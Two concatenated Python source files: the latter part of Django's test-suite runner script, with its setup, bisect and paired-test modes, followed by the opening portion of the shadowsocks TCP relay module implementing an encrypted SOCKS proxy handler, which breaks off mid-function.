'test_runner_invalid_app',
]
ALWAYS_INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.flatpages',
'django.contrib.redirects',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.comments',
'django.contrib.admin.apps.SimpleAdminConfig',
'django.contrib.admindocs',
'django.contrib.staticfiles',
'django.contrib.humanize',
'staticfiles_tests',
'staticfiles_tests.apps.test',
'staticfiles_tests.apps.no_label',
'servers.another_app',
]
ALWAYS_MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
def get_test_modules():
modules = []
discovery_paths = [
(None, RUNTESTS_DIR),
(CONTRIB_MODULE_PATH, CONTRIB_DIR)
]
for modpath, dirpath in discovery_paths:
for f in os.listdir(dirpath):
if ('.' in f or
f.startswith('sql') or
os.path.basename(f) in SUBDIRS_TO_SKIP or
os.path.isfile(f) or
not os.path.exists(os.path.join(dirpath, f, '__init__.py'))):
continue
modules.append((modpath, f))
return modules
def get_installed():
from django.apps import apps
return [app_config.name for app_config in apps.get_app_configs()]
def setup(verbosity, test_labels):
from django.apps import apps
from django.conf import settings
from django.test import TransactionTestCase, TestCase
print("Testing against Django installed in '%s'" % os.path.dirname(django.__file__))
# Force declaring available_apps in TransactionTestCase for faster tests.
def no_available_apps(self):
raise Exception("Please define available_apps in TransactionTestCase "
"and its subclasses.")
TransactionTestCase.available_apps = property(no_available_apps)
TestCase.available_apps = None
state = {
'INSTALLED_APPS': settings.INSTALLED_APPS,
'ROOT_URLCONF': getattr(settings, "ROOT_URLCONF", ""),
'TEMPLATE_DIRS': settings.TEMPLATE_DIRS,
'LANGUAGE_CODE': settings.LANGUAGE_CODE,
'STATIC_URL': settings.STATIC_URL,
'STATIC_ROOT': settings.STATIC_ROOT,
'MIDDLEWARE_CLASSES': settings.MIDDLEWARE_CLASSES,
}
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.STATIC_URL = '/static/'
settings.STATIC_ROOT = os.path.join(TEMP_DIR, 'static')
settings.TEMPLATE_DIRS = (os.path.join(RUNTESTS_DIR, TEST_TEMPLATE_DIR),)
settings.LANGUAGE_CODE = 'en'
settings.SITE_ID = 1
settings.MIDDLEWARE_CLASSES = ALWAYS_MIDDLEWARE_CLASSES
# Ensure the middleware classes are seen as overridden otherwise we get a compatibility warning.
settings._explicit_settings.add('MIDDLEWARE_CLASSES')
settings.MIGRATION_MODULES = {
# these 'tests.migrations' modules don't actually exist, but this lets
# us skip creating migrations for the test models.
'auth': 'django.contrib.auth.tests.migrations',
'contenttypes': 'django.contrib.contenttypes.tests.migrations',
}
if verbosity > 0:
# Ensure any warnings captured to logging are piped through a verbose
# logging handler. If any -W options were passed explicitly on command
# line, warnings are not captured, and this has no effect.
logger = logging.getLogger('py.warnings')
handler = logging.StreamHandler()
logger.addHandler(handler)
warnings.filterwarnings(
'ignore',
'django.contrib.comments is deprecated and will be removed before Django 1.8.',
RemovedInDjango18Warning
)
warnings.filterwarnings(
'ignore',
'Model class django.contrib.comments.models.* Django 1.9.',
RemovedInDjango19Warning
)
# Load all the ALWAYS_INSTALLED_APPS.
django.setup()
# Load all the test model apps.
test_modules = get_test_modules()
# Reduce given test labels to just the app module path
test_labels_set = set()
for label in test_labels:
bits = label.split('.')
if bits[:2] == ['django', 'contrib']:
bits = bits[:3]
else:
bits = bits[:1]
test_labels_set.add('.'.join(bits))
installed_app_names = set(get_installed())
for modpath, module_name in test_modules:
if modpath:
module_label = '.'.join([modpath, module_name])
else:
module_label = module_name
# if the module (or an ancestor) was named on the command line, or
# no modules were named (i.e., run all), import
# this module and add it to INSTALLED_APPS.
if not test_labels:
module_found_in_labels = True
else:
module_found_in_labels = any(
# exact match or ancestor match
module_label == label or module_label.startswith(label + '.')
for label in test_labels_set)
if module_found_in_labels and module_label not in installed_app_names:
if verbosity >= 2:
print("Importing application %s" % module_name)
settings.INSTALLED_APPS.append(module_label)
apps.set_installed_apps(settings.INSTALLED_APPS)
return state
def teardown(state):
from django.conf import settings
try:
# Removing the temporary TEMP_DIR. Ensure we pass in unicode
# so that it will successfully remove temp trees containing
# non-ASCII filenames on Windows. (We're assuming the temp dir
# name itself does not contain non-ASCII characters.)
shutil.rmtree(six.text_type(TEMP_DIR))
except OSError:
print('Failed to remove temp directory: %s' % TEMP_DIR)
# Restore the old settings.
for key, value in state.items():
setattr(settings, key, value)
def django_tests(verbosity, interactive, failfast, test_labels):
from django.conf import settings
state = setup(verbosity, test_labels)
extra_tests = []
# Run the test suite, including the extra validation tests.
from django.test.utils import get_runner
if not hasattr(settings, 'TEST_RUNNER'):
settings.TEST_RUNNER = 'django.test.runner.DiscoverRunner'
TestRunner = get_runner(settings)
test_runner = TestRunner(
verbosity=verbosity,
interactive=interactive,
failfast=failfast,
)
# Catch warnings thrown in test DB setup -- remove in Django 1.9
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
"Custom SQL location '<app_label>/models/sql' is deprecated, "
"use '<app_label>/sql' instead.",
RemovedInDjango19Warning
)
warnings.filterwarnings(
'ignore',
'initial_data fixtures are deprecated. Use data migrations instead.',
RemovedInDjango19Warning
)
warnings.filterwarnings(
'ignore',
'IPAddressField has been deprecated. Use GenericIPAddressField instead.',
RemovedInDjango19Warning
)
failures = test_runner.run_tests(
test_labels or get_installed(), extra_tests=extra_tests)
teardown(state)
return failures
def bisect_tests(bisection_label, options, test_labels):
state = setup(int(options.verbosity), test_labels)
test_labels = test_labels or get_installed()
print('***** Bisecting test suite: %s' % ' '.join(test_labels))
# Make sure the bisection point isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [bisection_label, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = [
sys.executable, upath(__file__), '--settings=%s' % options.settings]
if options.failfast:
subprocess_args.append('--failfast')
if options.verbosity:
subprocess_args.append('--verbosity=%s' % options.verbosity)
if not options.interactive:
subprocess_args.append('--noinput')
iteration = 1
while len(test_labels) > 1:
midpoint = len(test_labels) // 2
test_labels_a = test_labels[:midpoint] + [bisection_label]
test_labels_b = test_labels[midpoint:] + [bisection_label]
print('***** Pass %da: Running the first half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_a))
failures_a = subprocess.call(subprocess_args + test_labels_a)
print('***** Pass %db: Running the second half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_b))
print('')
failures_b = subprocess.call(subprocess_args + test_labels_b)
if failures_a and not failures_b:
print("***** Problem found in first half. Bisecting again...")
iteration = iteration + 1
test_labels = test_labels_a[:-1]
elif failures_b and not failures_a:
print("***** Problem found in second half. Bisecting again...")
iteration = iteration + 1
test_labels = test_labels_b[:-1]
elif failures_a and failures_b:
print("***** Multiple sources of failure found")
break
else:
print("***** No source of failure found... try pair execution (--pair)")
break
if len(test_labels) == 1:
print("***** Source of error: %s" % test_labels[0])
teardown(state)
def paired_tests(paired_test, options, test_labels):
state = setup(int(options.verbosity), test_labels)
test_labels = test_labels or get_installed()
print('***** Trying paired execution')
# Make sure the constant member of the pair isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [paired_test, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = [
sys.executable, upath(__file__), '--settings=%s' % options.settings]
if options.failfast:
subprocess_args.append('--failfast')
if options.verbosity:
subprocess_args.append('--verbosity=%s' % options.verbosity)
if not options.interactive:
subprocess_args.append('--noinput')
for i, label in enumerate(test_labels):
print('***** %d of %d: Check test pairing with %s' % (
i + 1, len(test_labels), label))
failures = subprocess.call(subprocess_args + [label, paired_test])
if failures:
print('***** Found problem pair with %s' % label)
return
print('***** No problem pair found')
teardown(state)
if __name__ == "__main__":
from optparse import OptionParser
usage = "%prog [options] [module module module ...]"
parser = OptionParser(usage=usage)
parser.add_option(
'-v', '--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all '
'output')
parser.add_option(
'--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
parser.add_option(
'--failfast', action='store_true', dest='failfast', default=False,
help='Tells Django to stop running the test suite after first failed '
'test.')
parser.add_option(
'--settings',
help='Python path to settings module, e.g. "myproject.settings". If '
'this isn\'t provided, the DJANGO_SETTINGS_MODULE environment '
'variable will be used.')
parser.add_option(
'--bisect', action='store', dest='bisect', default=None,
help='Bisect the test suite to discover a test that causes a test '
'failure when combined with the named test.')
parser.add_option(
'--pair', action='store', dest='pair', default=None,
help='Run the test suite in pairs with the named test to find problem '
'pairs.')
parser.add_option(
'--liveserver', action='store', dest='liveserver', default=None,
help='Overrides the default address where the live server (used with '
'LiveServerTestCase) is expected to run from. The default value '
'is localhost:8081.')
parser.add_option(
'--selenium', action='store_true', dest='selenium',
default=False,
help='Run the Selenium tests as well (if Selenium is installed)')
options, args = parser.parse_args()
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
else:
if "DJANGO_SETTINGS_MODULE" not in os.environ:
os.environ['DJANGO_SETTINGS_MODULE'] = 'test_sqlite'
options.settings = os.environ['DJANGO_SETTINGS_MODULE']
if options.liveserver is not None:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = options.liveserver
if options.selenium:
os.environ['DJANGO_SELENIUM_TESTS'] = '1'
if options.bisect:
bisect_tests(options.bisect, options, args)
elif options.pair:
paired_tests(options.pair, options, args)
else:
failures = django_tests(int(options.verbosity), options.interactive,
options.failfast, args)
if failures:
sys.exit(bool(failures))
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import sys
import time
import socket
import errno
import struct
import logging
import traceback
import random
from shadowsocks import encrypt, eventloop, shell, common
from shadowsocks.common import parse_header, onetimeauth_verify, \
onetimeauth_gen, ONETIMEAUTH_BYTES, ONETIMEAUTH_CHUNK_BYTES, \
ONETIMEAUTH_CHUNK_DATA_LEN, ADDRTYPE_AUTH
# we clear at most TIMEOUTS_CLEAN_SIZE timeouts each time
TIMEOUTS_CLEAN_SIZE = 512
MSG_FASTOPEN = 0x20000000
# SOCKS command definition
CMD_CONNECT = 1
CMD_BIND = 2
CMD_UDP_ASSOCIATE = 3
# for each opening port, we have a TCP Relay
# for each connection, we have a TCP Relay Handler to handle the connection
# for each handler, we have 2 sockets:
# local: connected to the client
# remote: connected to remote server
# for each handler, it could be at one of several stages:
# as sslocal:
# stage 0 SOCKS hello received from local, send hello to local
# stage 1 addr received from local, query DNS for remote
# stage 2 UDP assoc
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
# as ssserver:
# stage 0 just jump to stage 1
# stage 1 addr received from local, query DNS for remote
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
STAGE_INIT = 0
STAGE_ADDR = 1
STAGE_UDP_ASSOC = 2
STAGE_DNS = 3
STAGE_CONNECTING = 4
STAGE_STREAM = 5
STAGE_DESTROYED = -1
# for each handler, we have 2 stream directions:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
STREAM_UP = 0
STREAM_DOWN = 1
# for each stream, it's waiting for reading, or writing, or both
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
BUF_SIZE = 32 * 1024
class TCPRelayHandler(object):
def __init__(self, server, fd_to_handlers, loop, local_sock, config,
dns_resolver, is_local):
self._server = server
self._fd_to_handlers = fd_to_handlers
self._loop = loop
self._local_sock = local_sock
self._remote_sock = None
self._config = config
self._dns_resolver = dns_resolver
# TCP Relay works as either sslocal or ssserver
# if is_local, this is sslocal
self._is_local = is_local
self._stage = STAGE_INIT
self._encryptor = encrypt.Encryptor(config['password'],
config['method'])
if 'one_time_auth' in config and config['one_time_auth']:
self._ota_enable = True
else:
self._ota_enable = False
self._ota_buff_head = b''
self._ota_buff_data = b''
self._ota_len = 0
self._ota_chunk_idx = 0
self._fastopen_connected = False
self._data_to_write_to_local = []
self._data_to_write_to_remote = []
self._upstream_status = WAIT_STATUS_READING
self._downstream_status = WAIT_STATUS_INIT
self._client_address = local_sock.getpeername()[:2]
self._remote_address = None
if 'forbidden_ip' in config:
self._forbidden_iplist = config['forbidden_ip']
else:
self._forbidden_iplist = None
if is_local:
self._chosen_server = self._get_a_server()
fd_to_handlers[local_sock.fileno()] = self
local_sock.setblocking(False)
local_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
loop.add(local_sock, eventloop.POLL_IN | eventloop.POLL_ERR,
self._server)
self.last_activity = 0
self._update_activity()
def __hash__(self):
# default __hash__ is id / 16
# we want to eliminate collisions
return id(self)
@property
def remote_address(self):
return self._remote_address
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
if type(server) == list:
server = random.choice(server)
logging.debug('chosen server: %s:%d', server, server_port)
return server, server_port
def _update_activity(self, data_len=0):
# tell the TCP Relay we have activities recently
# else it will think we are inactive and timed out
self._server.update_activity(self, data_len)
def _update_stream(self, stream, status):
# update a stream to a new waiting status
# check if status is changed
# only update if dirty
dirty = False
if stream == STREAM_DOWN:
if self._downstream_status != status:
self._downstream_status = status
dirty = True
elif stream == STREAM_UP:
if self._upstream_status != status:
self._upstream_status = status
dirty = True
if dirty:
if self._local_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
if self._upstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
self._loop.modify(self._local_sock, event)
if self._remote_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
if self._upstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
self._loop.modify(self._remote_sock, event)
def _write_to_sock(self, data, sock):
# write data to sock
# if only some of the data are written, put remaining in the buffer
# and update the stream to wait for writing
if not data or not sock:
return False
uncomplete = False
try:
l = len(data)
s = sock.send(data)
if s < l:
data = data[s:]
uncomplete = True
except (socket.error, OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if sys.platform == "win32":
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK, errno.WSAEWOULDBLOCK):
uncomplete = True
elif error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
uncomplete = True
else:
shell.print_exception(e)
self.destroy()
return False
if uncomplete:
if sock == self._local_sock:
self._data_to_write_to_local.append(data)
self._update_stream(STREAM_DOWN, WAIT_STATUS_WRITING)
elif sock == self._remote_sock:
self._data_to_write_to_remote.append(data)
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
else:
logging.error('write_all_to_sock:unknown socket')
else:
if sock == self._local_sock:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
elif sock == self._remote_sock:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
else:
logging.error('write_all_to_sock:unknown socket')
return True
def _handle_stage_connecting(self, data):
if self._is_local:
if self._ota_enable:
data = self._ota_chunk_data_gen(data)
data = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data)
else:
if self._ota_enable:
self._ota_chunk_data(data,
self._data_to_write_to_remote.append)
else:
self._data_to_write_to_remote.append(data)
if self._is_local and not self._fastopen_connected and \
self._config['fast_open']:
# for sslocal and fastopen, we basically wait for data and use
# sendto to connect
try:
# only connect once
self._fastopen_connected = True
remote_sock = \
self._create_remote_socket(self._chosen_server[0],
self._chosen_server[1])
self._loop.add(remote_sock, eventloop.POLL_ERR, self._server)
data = b''.join(self._data_to_write_to_remote)
l = len(data)
s = remote_sock.sendto(data, MSG_FASTOPEN,
self._chosen_server)
if s < l:
data = data[s:]
self._data_to_write_to_remote = [data]
else:
self._data_to_write_to_remote = []
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
except (socket.error, OSError, IOError) as e:
if eventloop.errno_from_exception(e) == errno.EINPROGRESS:
# in this case data is not sent at all
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
elif eventloop.errno_from_exception(e) == errno.ENOTCONN:
logging.error('fast open not supported on this OS')
self._config['fast_open'] = False
self.destroy()
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _handle_stage_addr(self, data):
try:
if self._is_local:
cmd = common.ord(data[1])
if cmd == CMD_UDP_ASSOCIATE:
logging.debug('UDP associate')
if self._local_sock.family == socket.AF_INET6:
header = b'\x05\x00\x00\x04'
else:
header = b'\x05\x00\x00\x01'
addr, port = self._local_sock.getsockname()[:2]
addr_to_send = socket.inet_pton(self._local_sock.family,
addr)
port_to_send = struct.pack('>H', port)
self._write_to_sock(header + addr_to_send + port_to_send,
self._local_sock)
self._stage = STAGE_UDP_ASSOC
# just wait for the client to disconnect
return
elif cmd == CMD_CONNECT:
# just trim VER CMD RSV
data = data[3:]
else:
logging.error('unknown command %d', cmd)
self.destroy()
return
header_result = parse_header(data)
if header_result is None:
raise Exception('can not parse header')
addrtype, remote_addr, remote_port, header_length = header_result
logging.info('connecting %s:%d from %s:%d' %
(common.to_str(remote_addr), remote_port,
self._client_address[0], self._client_address[1]))
if self._is_local is False:
# spec https://shadowsocks.org/en/spec/one-time-auth.html
if self._ota_enable or addrtype & ADDRTYPE_AUTH:
if len(data) < header_length + ONETIMEAUTH_BYTES:
logging.warn('one time auth header is too short')
return None
offset = header_length + ONETIMEAUTH_BYTES
_hash = data[header_length: offset]
_data = data[:header_length]
key = self._encryptor.decipher_iv + self._encryptor.key
if onetimeauth_verify(_hash, _data, key) is False:
logging.warn('one time auth fail')
self.destroy()
header_length += ONETIMEAUTH_BYTES
self._remote_address = (common.to_str(remote_addr), remote_port)
# pause reading
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
self._stage = STAGE_DNS
if self._is_local:
# forward address to remote
self._write_to_sock((b'\x05\x00\x00\x01'
b'\x00\x00\x00\x00\x10\x10'),
self._local_sock)
# spec https://shadowsocks.org/en/spec/one-time-auth.html
# ATYP & 0x10 == 1, then OTA is enabled.
if self._ota_enable:
data = common.chr(addrtype | ADDRTYPE_AUTH) + data[1:]
key = self._encryptor.cipher_iv + self._encryptor.key
data += onetimeauth_gen(data, key)
data_to_send = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data_to_send)
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(self._chosen_server[0],
self._handle_dns_resolved)
else:
if self._ota_enable:
data = data[header_length:]
self._ota_chunk_data(data,
self._data_to_write_to_remote.append)
elif len(data) > header_length:
self._data_to_write_to_remote.append(data[header_length:])
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(remote_addr,
self._handle_dns_resolved)
except Exception as e:
self._log_error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _create_remote_socket(self, ip, port):
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM,
socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
af, socktype, proto, canonname, sa = addrs[0]
if self._forbidden_iplist:
if common.to_str(sa[0]) in self._forbidden_iplist:
raise Exception('IP %s is in forbidden list, reject' %
common.to_str(sa[0]))
remote_sock = socket.socket(af, socktype, proto)
self._remote_sock = remote_sock
self._fd_to_handlers[remote_sock.fileno()] = self
remote_sock.setblocking(False)
remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
return remote_sock
def _handle_dns_resolved(self, result, error):
if error:
self._log_error(error)
self.destroy()
return
if result and result[1]:
ip = result[1]
try:
self._stage = STAGE_CONNECTING
remote_addr = ip
if self._is_local:
remote_port = self._chosen_server[1]
else:
remote_port = self._remote_address[1]
if self._is_local and self._config['fast_open']:
# for fastopen:
# wait for more data arrive and send them in one SYN
self._stage = STAGE_CONNECTING
# we don't have to wait for remote since it's not
# created
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
# TODO when there is already data in this packet
else:
# else do connect
remote_sock = self._create_remote_socket(remote_addr,
remote_port)
try:
remote_sock.connect((remote_addr, remote_port))
except (socket.error, OSError, IOError) as e:
if eventloop.errno_from_exception(e) == \
errno.EINPROGRESS:
pass
self._loop.add(remote_sock,
eventloop.POLL_ERR | eventloop.POLL_OUT,
self._server)
self._stage = STAGE_CONNECTING
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
return
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _write_to_sock_remote(self, data):
self._write_to_sock(data, self._remote_sock)
def _ota_chunk_data(self, data, data_cb):
# spec https://shadowsocks.org/en/spec/one-time-auth.html
while len(data) > 0:
if self._ota_len == 0:
# get DATA.LEN + HMAC-SHA1
length = ONETIMEAUTH_CHUNK_BYTES - len(self._ota_buff_head)
self._ota_buff_head += data[:length]
data = data[length:]
if len(self._ota_buff_head) < ONETIMEAUTH_CHUNK_BYTES:
# wait more data
return
data_len = self._ota_buff_head[:ONETIMEAUTH_CHUNK_DATA_LEN]
self._ota_len = struct.unpack('>H', data_len)[0]
length = min(self._ota_len, len(data))
self._ota_buff_data += data[:length]
data = data[length:]
if len(self._ota_buff_data) == self._ota_len:
# get a chunk data
_hash = self._ota_buff_head[ONETIMEAUTH_CHUNK_DATA_LEN:]
_data = self._ota_buff_data
index = struct.pack('>I', self._ota_chunk_idx)
key = self._encryptor.decipher_iv + index
if onetimeauth_verify(_hash, _data, key) is False:
logging.warn('one time auth fail, drop chunk !')
else:
data_cb(self._ota_buff_data)
self._ota_chunk_idx += 1
self._ota_buff_head = b''
self._ota_buff_data = b''
self._ota_len = 0
return
def _ota_chunk_data_gen(self, data):
data_len = struct.pack(">H", len(data))
index = struct.pack('>I', self._ota_chunk_idx)
key = self._encryptor.cipher_iv + index
sha110 = onetimeauth_gen(data, key)
self._ota_chunk_idx += 1
return data_len + sha110 + data
def _handle_stage_stream(self, data):
if self._is_local:
if self._ota_enable:
data = self._ota_chunk_data_gen(data)
data = self._encryptor.encrypt(data)
self._write_to_sock(data, self._remote_sock)
else:
if self._ota_enable:
self._ota_chunk_data(data, self._write_to_sock_remote)
else:
self._write_to_sock(data, self._remote_sock)
return
def _on_local_read(self):
# handle all local read events and dispatch them to methods for
# each stage
if not self._local_sock:
return
is_local = self._is_local
data = None
try:
data = self._local_sock.recv(BUF_SIZE)
except (socket.error, OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if sys.platform == "win32":
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK, errno.WSAEWOULDBLOCK):
return
elif error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
self._update_activity(len(data))
if not is_local:
data = self._encryptor.decrypt(data)
if not data:
return
if self._stage == STAGE_STREAM:
self._handle_stage_stream(data)
return
elif is_local and self._stage == STAGE_INIT:
# TODO check auth method
self._write_to_sock(b'\x05\00', self._local_sock)
self._stage = STAGE_ADDR
return
elif self._stage == STAGE_CONNECTING:
self._handle_stage_connecting(data)
elif (is_local and self._stage == STAGE_ADDR) or \
(not is_local and self._stage == STAGE_INIT):
self._handle_stage_addr(data)
def _on_remote_read(self):
# handle all remote read events
data = None
try:
data = self._remote_sock.recv(BUF_SIZE)
except socket.error as err:
error_no = err.args[0]
if sys.platform == "win32":
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK, errno.WSAEWOULDBLOCK):
return
elif error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
self._update_activity(len(data))
if self._is_local:
data = self._encryptor.decrypt(data)
else:
data = self._encryptor.encrypt(data)
try:
self._write_to_sock(data, self._local_sock)
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _on_local_write(self):
# handle local writable event
if self._data_to_write_to_local:
data = b''.join(self._data_to_write_to_local)
self._data_to_write_to_local = []
self._write_to_sock(data, self._local_sock)
else:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
def _on_remote_write(self):
# handle remote writable event
self._stage = STAGE_STREAM
if self._data_to_write_to_remote:
data = b''.join(self._data_to_write_to_remote)
self._data_to_write_to_remote = []
self._write_to_sock(data, self._remote_sock)
else:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
def _on_local_error(self):
logging.debug('got local error')
if self._local_sock:
logging.error(eventloop.get_sock_error(self._local_sock))
self.destroy()
def _on_remote_error(self):
logging.debug('got remote error')
if self._remote_sock:
logging.error(eventloop.get_sock_error(self._remote_sock))
self.destroy()
def handle_event(self, sock, event):
# handle all events in this handler and dispatch them to methods
if self._stage == STAGE_DESTROYED:
logging.debug('ignore handle_event: destroyed')
return
# order is important
if sock == self._remote_sock:
if event & eventloop.POLL_ERR:
self._on_remote_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_remote_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_remote_write()
elif sock == self._local_sock:
if event & eventloop.POLL_ERR:
self._on_local_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_local_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_local_write()
else:
logging.warn('unknown socket')
def _log_error(self, e):
logging.error('%s when handling connection from %s:%d' %
(e, self._client_address[0], self._client_address[1]))
def destroy(self):
# destroy the handler and release any resources
# promises:
# 1. destroy won't make another destroy() call inside
# 2. destroy releases resources so it prevents future call to destroy
# 3. destroy won't raise any exceptions
# if any of the promises are broken, it indicates a bug has been
# introduced! mostly likely memory leaks, etc
if self._stage == STAGE_DESTROYED:
# this couldn't happen
logging.debug('already destroyed')
return
self._stage = STAGE_DESTROYED
if self._remote_address:
logging.debug('destroy: %s:%d' %
self._remote_address)
else:
logging.debug('destroy')
if self._remote_sock:
logging.debug('destroying remote')
self._loop.remove(self._remote_sock)
del self._fd_to_handlers[self._remote_sock.fileno()]
self._remote_sock.close()
self._remote_sock = None
if self._local_sock:
logging.debug('destroying local')
self._loop.remove(self._local_sock)
del self._fd_to_handlers[self._local_sock.fileno()]
self._local_sock.close()
self._local_sock = None
self._dns_resolver.remove_callback(self._handle_dns_resolved)
self._server.remove_handler(self)
class TCPRelay(object):
def __init__(self, config, dns_resolver, is_local, stat_callback=None):
self._config = config
self._is_local = is_local
self._dns_resolver = dns_resolver
self._closed = False
self._eventloop = None
self._fd_to_handlers = {}
self._timeout = config['timeout']
self._timeouts = [] # a list for all the handlers
# we trim the timeouts once a while
self._timeout_offset = 0 # last checked position for timeout
self._handler_to_timeouts = {} # key: handler value: index in timeouts
if is_local:
listen_addr = config['local_address']
listen_port = config['local_port']
else:
listen_addr = config['server']
listen_port = config['server_port']
self._listen_port = listen_port
addrs = socket.getaddrinfo(listen_addr, listen_port, 0,
socket.SOCK_STREAM, socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(listen_addr, listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(sa)
server_socket.setblocking(False)
if config['fast_open']:
try:
server_socket.setsockopt(socket.SOL_TCP, 23, 5)
except socket.error:
logging.error('warning: fast open is not available')
self._config['fast_open'] = False
server_socket.listen(1024)
self._server_socket = server_socket
self._stat_callback = stat_callback
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already add to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
self._eventloop.add(self._server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR, self)
self._eventloop.add_periodic(self.handle_periodic)
def remove_handler(self, handler):
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
del self._handler_to_timeouts[hash(handler)]
def update_activity(self, handler, data_len):
if data_len and self._stat_callback:
self._stat_callback(self._listen_port, data_len)
# set handler to active
now = int(time.time())
if now - handler.last_activity < eventloop.TIMEOUT_PRECISION:
# thus we can lower timeout modification frequency
return
handler.last_activity = now
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
length = len(self._timeouts)
self._timeouts.append(handler)
self._handler_to_timeouts[hash(handler)] = length
def _sweep_timeout(self):
# tornado's timeout memory management is more flexible than we need
# we just need a sorted last_activity queue and it's faster than heapq
# in fact we can do O(1) insertion/remove so we invent our own
if self._timeouts:
